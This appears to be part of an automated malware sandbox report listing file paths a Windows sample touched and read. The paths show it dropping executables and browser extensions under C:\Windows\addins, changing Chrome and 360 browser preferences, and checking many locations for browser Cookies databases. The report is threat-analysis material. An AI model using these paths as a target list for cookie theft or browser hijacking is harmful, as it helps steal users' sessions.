  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.057\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\Local\360chrome\chrome\UserData\Default\Cookies
  • C:\Program Files (x86)\360\xe6\x9e\x81~1\360chr~1\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.272\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\Chrome\User Data\Default\Cookies
  • C:\360\xe5\xae\x89\xe5\x85\xa8\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • U:\\xe5\xb8\xb8\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • Z:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\Users\test\Desktop
  • C:\Windows\SysWOW64\shell32.dll
  • C:\
  • C:\Users\test\AppData\Local\Microsoft\Windows\Caches
  • C:\Users\test\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
  • C:\Users\test\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000052.db
  • C:\Users\desktop.ini
  • C:\Users\test
  • C:\Users\test\Desktop\desktop.ini
  • C:\Users\test\Desktop\*.*
  • C:\Windows\System32\tzres.dll
  • \??\MountPointManager
  • C:\program files (x86)
  • C:\program files (x86)\Google
  • C:\program files (x86)\Google\Chrome
  • C:\program files (x86)\Google\Chrome\user data
  • C:\program files (x86)\Google\Chrome\user data\Default
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences_Temp
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\xiaobai\Preferences
  • C:\Windows\addins\dbhelper.exe
  • C:\Users\test\AppData\Local\Temp\Preferences
  • C:\Windows\addins\xiaobai\paths.txt
  • C:\Windows\fclog_2019-12-10 23:37:12 >>>>>>>>> .txt
  • C:\Users\Administrator\AppData\Local\xbbrowser
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data\Default
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data\Default\Secure Preferences
  • C:\Users\test\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Windows\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Program Files (x86)\WinRAR\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Users\test\AppData\Local\Temp\ext-ms-win-kernel32-package-current-l1-1-0.DLL
  • C:\Windows\SysWOW64\svchost.exe
  • C:\Users\test\AppData\Local\Temp
  • C:\Users\test\AppData
  • C:\Users\test\AppData\Local
  • C:\Users\test\AppData\Local\Temp\-p
  • C:\Windows\FeiOnline\
  • C:\Windows\*.*
  • C:\Users\test\AppData\Local\Temp\32463211
  • C:\Users\test\AppData\Local\Temp\32463211\....\
  • C:\Users\test\AppData\Local\Temp\32463211\....\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\32463211\*.*
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile\*.*
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile\TemporaryFile
  • C:\Windows\System32\winhttp.dll
  • C:\Users\test\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
  • C:\Users\test\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
  • C:\Users\test\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[1].txt
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[2].txt
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\s[1].txt
  • C:\Windows\WindowsShell.manifest
  • C:\Windows\win.ini
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\bd_logo1[1].png
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\baidu_resultlogo@2[1].png
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\baidu_jgylogo3[1].gif
  • C:\Windows\System32\dxtmsft.dll
  • C:\Windows\System32\dxtrans.dll
  • C:\Windows\sysnative\C_1250.NLS
  • C:\Windows\sysnative\C_1251.NLS
  • C:\Windows\sysnative\C_1253.NLS
  • C:\Windows\sysnative\C_1254.NLS
  • C:\Windows\sysnative\C_1255.NLS
  • C:\Windows\sysnative\C_1256.NLS
  • C:\Windows\sysnative\C_1257.NLS
  • C:\Windows\sysnative\C_1258.NLS
  • C:\Windows\sysnative\C_874.NLS
  • C:\Windows\sysnative\C_932.NLS
  • C:\Windows\sysnative\C_949.NLS
  • C:\Windows\sysnative\C_950.NLS
  • C:\Windows\sysnative\C_1361.NLS
  • C:\Windows\sysnative\C_864.NLS
  • C:\Windows\sysnative\C_708.NLS
  • C:\Windows\sysnative\C_720.NLS
  • C:\Windows\sysnative\C_28596.NLS
  • C:\Windows\sysnative\C_10004.NLS
  • C:\Windows\sysnative\C_775.NLS
  • C:\Windows\sysnative\C_28594.NLS
  • C:\Windows\sysnative\C_852.NLS
  • C:\Windows\sysnative\C_28592.NLS
  • C:\Windows\sysnative\C_10029.NLS
  • C:\Windows\sysnative\C_G18030.DLL
  • C:\Windows\sysnative\C_20936.NLS
  • C:\Windows\sysnative\C_IS2022.DLL
  • C:\Windows\sysnative\C_10008.NLS
  • C:\Windows\sysnative\C_20000.NLS
  • C:\Windows\sysnative\C_20002.NLS
  • C:\Windows\sysnative\C_10002.NLS
  • C:\Windows\sysnative\C_10082.NLS
  • C:\Windows\sysnative\C_866.NLS
  • C:\Windows\sysnative\C_28595.NLS
  • C:\Windows\sysnative\C_20866.NLS
  • C:\Windows\sysnative\C_21866.NLS
  • C:\Windows\sysnative\C_10007.NLS
  • C:\Windows\sysnative\c_28603.nls
  • C:\Windows\sysnative\C_21027.NLS
  • C:\Windows\sysnative\C_863.NLS
  • C:\Windows\sysnative\C_20106.NLS
  • C:\Windows\sysnative\C_737.NLS
  • C:\Windows\sysnative\C_28597.NLS
  • C:\Windows\sysnative\C_10006.NLS
  • C:\Windows\sysnative\C_869.NLS
  • C:\Windows\sysnative\C_862.NLS
  • C:\Windows\sysnative\C_28598.NLS
  • C:\Windows\sysnative\C_10005.NLS
  • C:\Windows\sysnative\C_20003.NLS
  • C:\Windows\sysnative\C_20420.NLS
  • C:\Windows\sysnative\C_20880.NLS
  • C:\Windows\sysnative\C_21025.NLS
  • C:\Windows\sysnative\C_20277.NLS
  • C:\Windows\sysnative\C_1142.NLS
  • C:\Windows\sysnative\C_20278.NLS
  • C:\Windows\sysnative\C_1143.NLS
  • C:\Windows\sysnative\C_20297.NLS
  • C:\Windows\sysnative\C_1147.NLS
  • C:\Windows\sysnative\C_20273.NLS
  • C:\Windows\sysnative\C_1141.NLS
  • C:\Windows\sysnative\C_20423.NLS
  • C:\Windows\sysnative\C_875.NLS
  • C:\Windows\sysnative\C_20424.NLS
  • C:\Windows\sysnative\C_20871.NLS
  • C:\Windows\sysnative\C_1149.NLS
  • C:\Windows\sysnative\C_500.NLS
  • C:\Windows\sysnative\C_1148.NLS
  • C:\Windows\sysnative\C_20280.NLS
  • C:\Windows\sysnative\C_1144.NLS
  • C:\Windows\sysnative\C_20290.NLS
  • C:\Windows\sysnative\C_20833.NLS
  • C:\Windows\sysnative\C_870.NLS
  • C:\Windows\sysnative\C_20284.NLS
  • C:\Windows\sysnative\C_1145.NLS
  • C:\Windows\sysnative\C_20838.NLS
  • C:\Windows\sysnative\C_20905.NLS
  • C:\Windows\sysnative\C_1026.NLS
  • C:\Windows\sysnative\C_20285.NLS
  • C:\Windows\sysnative\C_1146.NLS
  • C:\Windows\sysnative\C_037.NLS
  • C:\Windows\sysnative\C_1140.NLS
  • C:\Windows\sysnative\C_1047.NLS
  • C:\Windows\sysnative\C_20924.NLS
  • C:\Windows\sysnative\C_861.NLS
  • C:\Windows\sysnative\C_10079.NLS
  • C:\Windows\sysnative\C_ISCII.DLL
  • C:\Windows\sysnative\C_20269.NLS
  • C:\Windows\sysnative\C_20932.NLS
  • C:\Windows\sysnative\C_10001.NLS
  • C:\Windows\sysnative\C_20949.NLS
  • C:\Windows\sysnative\C_10003.NLS
  • C:\Windows\sysnative\C_28593.NLS
  • C:\Windows\sysnative\C_28605.NLS
  • C:\Windows\sysnative\C_865.NLS
  • C:\Windows\sysnative\C_20108.NLS
  • C:\Windows\sysnative\C_855.NLS
  • C:\Windows\sysnative\C_437.NLS
  • C:\Windows\sysnative\C_858.NLS
  • C:\Windows\sysnative\C_860.NLS
  • C:\Windows\sysnative\C_10010.NLS
  • C:\Windows\sysnative\C_20107.NLS
  • C:\Windows\sysnative\C_20261.NLS
  • C:\Windows\sysnative\C_20001.NLS
  • C:\Windows\sysnative\C_20004.NLS
  • C:\Windows\sysnative\C_10021.NLS
  • C:\Windows\sysnative\C_857.NLS
  • C:\Windows\sysnative\C_28599.NLS
  • C:\Windows\sysnative\C_10081.NLS
  • C:\Windows\sysnative\C_10017.NLS
  • C:\Windows\sysnative\C_20005.NLS
  • C:\Windows\sysnative\C_850.NLS
  • C:\Windows\sysnative\C_20105.NLS
  • C:\Windows\sysnative\C_28591.NLS
  • C:\Windows\sysnative\C_10000.NLS
  • C:\Windows\SysWOW64\en-US\MLANG.dll.mui
  • C:\Windows\SysWOW64\ieframe.dll
  • C:\Windows\SysWOW64\ieframe.dll:Zone.Identifier
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\dnserrordiagoff_webOC[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\ErrorPageTemplate[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HEL4YQ7U\errorPageStrings[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\httpErrorPagesScripts[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\background_gradient[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HEL4YQ7U\info_48[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\bullet[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\down[1]
读取的文件
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Users\test\AppData\Local\Temp\mir.exe
  • C:\Windows\FeiOnline\down.ini
  • C:\Windows\SysWOW64\cqsfConfig.ini
  • C:\Windows\addins\ExtensionDll.dll
  • C:\Windows\addins\SuoLock.exe
  • C:\Windows\SysWOW64\audiodgx.dll
  • C:\Windows\SysWOW64\sesvc.exe
  • C:\Windows\fclog.txt
  • C:\Windows\SysWOW64\cacert.der
  • \Device\KsecDD
  • C:\Windows\fontclass.exe
  • C:\Windows\fontclass.dll
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\proxy[1].pac
  • C:\Windows\fclog_2019-12-10 23:06:27 >>>>>>>>> .txt
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\Google\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\360\Preferences
  • C:\Windows\addins\Google\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\Google\Preferences
  • C:\Windows\addins\360\paths.txt
  • C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
  • C:\User Data\Default\Cookies
  • C:\program files (x86)\User Data\Default\Cookies
  • C:\program files (x86)\Google\User Data\Default\Cookies
  • C:\program files (x86)\Google\Chrome\User Data\Default\Cookies
  • C:\program files (x86)\360js\360chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\Local\360chrome\chrome\User Data\Default\Cookies
  • C:\360jisu\User Data\Default\Cookies
  • C:\program files (x86)\360\360chrome\User Data\Default\Cookies
  • C:\Users\wkb\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe5\xb8\xb8\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360chrome\chrome\User Data\Default\Cookies
  • C:\chrome\User Data\Default\Cookies
  • D:\360chrome\chrome\User Data\Default\Cookies
  • G:\gamebase\seecom\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\1\administrator\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • C:\360js\360chrome\chrome\User Data\Default\Cookies
  • C:\program files\360js\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360js\360chrome\chrome\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81\xe9\x80\x9f\360chrome\chrome\User Data\Default\Cookies
  • M:\360js\360chrome\chrome\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\360\administrator\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe7\x89\x88\360chrome\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\360chrome\User Data\Default\Cookies
  • C:\360jisu\360chrome\chrome\User Data\Default\Cookies
  • C:\360ji\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\Local\360chrome\chrome\application\User Data\Default\Cookies
  • Z:\users\administrator\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • C:\program files\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360chrome\User Data\Default\Cookies
  • G:\\xe7\xbd\x91\xe5\x90\xa7\xe7\xbb\xbf\xe8\x89\xb2\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\tools\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360jisu\User Data\Default\Cookies
  • Z:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • D:\gamebase\seecom\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\program files (x86)\360\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\360chr~1\chrome\User Data\Default\Cookies
  • D:\program files (x86)\360chrome\chrome\User Data\Default\Cookies
  • C:\bak\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360jisu\User Data\Default\Cookies
  • U:\gamebase\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\360chrome\chrome\User Data\Default\Cookies
  • Z:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\360js\360chr~1\chrome\User Data\Default\Cookies
  • D:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • D:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • D:\\xe7\xbd\x91\xe7\xae\xa1\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\Users\wkb\appdata\local\mychrome\chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\Local\User Data\Default\Cookies
  • D:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • E:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • F:\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\0\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • C:\program files\360chrome\User Data\Default\Cookies
  • Z:\tool\chrome\chrome-bin\User Data\Default\Cookies
  • D:\tools\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\User Data\Default\Cookies
  • C:\360chrome\User Data\Default\Cookies
  • C:\program files (x86)\360chrome\chrome\User Data\Default\Cookies
  • G:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\sys\360\360chrome\chrome\User Data\Default\Cookies
  • P:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • H:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • E:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\netbarie\User Data\Default\Cookies
  • C:\360\360chrome\chrome\User Data\Default\Cookies
  • Z:\\xe4\xb8\x96\xe5\x8f\x8b\xe8\xbd\xaf\xe4\xbb\xb6\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • E:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • D:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\360chrome\360chrome\chrome\User Data\Default\Cookies
  • C:\program files\360\360chrome\User Data\Default\Cookies
  • Y:\\xe8\xa1\xa5\xe4\xb8\x81\xe6\x96\x87\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\administrator\local settings\application data\360chrome\chrome\User Data\Default\Cookies
  • C:\Windows\application\User Data\Default\Cookies
  • C:\Users\fyd.fyd-pc\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • R:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\program files\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa811.0.2116.0\xe7\xbb\xbf\xe8\x89\xb2\xe7\x89\x88-\xe5\x8e\xbb\xe5\xb0\xbe\xe5\xb7\xb4\xe4\xbf\xae\xe5\xa4\x8d\xe7\xad\x89 2019006_slsup.com\User Data\Default\Cookies
  • X:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Z:\xww\ie\chrome\User Data\Default\Cookies
  • R:\\xe7\xbd\x91\xe7\xbb\x9c\xe6\xb8\xb8\xe6\x88\x8f\kjml\\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\360se\360chrome\chrome\User Data\Default\Cookies
  • R:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • S:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • E:\\xe7\xbd\x91\xe9\xa1\xb5\xe6\xb5\x8f\xe8\xa7\x88\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\360\xe7\xbb\xbf\xe8\x89\xb2\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360jisu\User Data\Default\Cookies
  • Y:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • G:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\Windows\back\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa811.0.2140\User Data\Default\Cookies
  • H:\tools\360chrome\chrome\User Data\Default\Cookies
  • F:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • X:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\program files\360ie\360chrome\chrome\User Data\Default\Cookies
  • H:\\xe8\xbe\x85\xe5\x8a\xa9\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • H:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • O:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • D:\\xe7\xbd\x91\xe9\xa1\xb5\xe6\xb5\x8f\xe8\xa7\x88\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\chrome\User Data\Default\Cookies
  • L:\haijun\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe5\x85\xb6\xe5\xae\x83\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • N:\360chrome\chrome\User Data\Default\Cookies
  • C:\tools\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • X:\sysset\menu\360chrome\User Data\Default\Cookies
  • C:\\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • X:\tools\\xe7\xbd\x91\xe5\x90\xa7\xe4\xb8\xbb\xe9\xa1\xb5\chrome\User Data\Default\Cookies
  • C:\program files\360chrome\chrome-bin\User Data\Default\Cookies
  • G:\\xe5\xb8\xb8\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • T:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Z:\drv\1.\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\roaming\chrome_360\User Data\Default\Cookies
  • E:\\xe7\xbd\x91\xe9\xa1\xb5\xe6\xb5\x8f\xe8\xa7\x88\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\chrome\User Data\Default\Cookies
  • W:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\360chrome\User Data\Default\Cookies
